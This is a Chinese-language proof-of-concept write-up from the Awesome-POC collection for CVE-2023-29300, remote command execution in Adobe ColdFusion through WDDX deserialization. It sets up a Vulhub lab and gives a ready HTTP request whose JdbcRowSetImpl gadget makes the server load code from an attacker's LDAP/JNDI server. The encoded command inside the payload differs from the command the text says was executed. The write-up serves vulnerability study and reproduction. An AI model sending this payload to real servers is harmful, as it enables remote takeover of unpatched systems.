admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Adobe ColdFusion XML 反序列化命令执行漏洞 CVE-2023-29300.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

53 lines
2.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Adobe ColdFusion XML 反序列化命令执行漏洞 CVE-2023-29300
## 漏洞描述
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品其运行的CFMLColdFusion Markup Language是针对Web应用的一种程序设计语言。
Adobe ColdFusion在2018.0.16、2021.0.6、2023.0.0.330468版本及以前存在一处XML反序列化漏洞。攻击者可以利用该漏洞调用Java中任意setter方法最终执行任意命令。
参考链接:
- [https://blog.projectdiscovery.io/adobe-coldfusion-rce/](https://blog.projectdiscovery.io/adobe-coldfusion-rce/)
- [https://xz.aliyun.com/t/13413](https://xz.aliyun.com/t/13413)
## 环境搭建
Vulhub启动一个Adobe ColdFusion 2018.0.15服务器:
```
docker compose up -d
```
等待一段时间后环境启动成功,访问`http://your-vps-ip:8500/CFIDE/administrator/index.cfm`,输入密码`vulhub`即可成功安装Adobe ColdFusion。
![](images/Adobe%20ColdFusion%20XML%20反序列化命令执行漏洞%20CVE-2023-29300/image-20240226160629443.png)
## 漏洞复现
要利用这个漏洞需要先找到一个可利用的setter方法作为Gadget。最常见的Gadget是利用`com.sun.rowset.JdbcRowSetImpl`来进行JNDI注入并执行任意命令。
首先启动一个恶意JNDI服务器并加载`CommonsBeanutils1`作为内层反序列化Gadget。Github上有数个工具可以使用比如[https://github.com/rebeyond/JNDInjector/releases](https://github.com/rebeyond/JNDInjector/releases)
![](images/Adobe%20ColdFusion%20XML%20反序列化命令执行漏洞%20CVE-2023-29300/image-20240226154836838.png)
然后将恶意LDAP地址替换到如下请求中发送
```
POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 333
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://192.168.24.1/HiJbyQaUgJ/CommonsBeanutils1/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL2F3ZXNvbWVfcG9jIn0=</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>
```
可见,`touch /tmp/success`已被成功执行:
![](images/Adobe%20ColdFusion%20XML%20反序列化命令执行漏洞%20CVE-2023-29300/image-20240226154946942.png)
Reference in New Issue View Git Blame Copy Permalink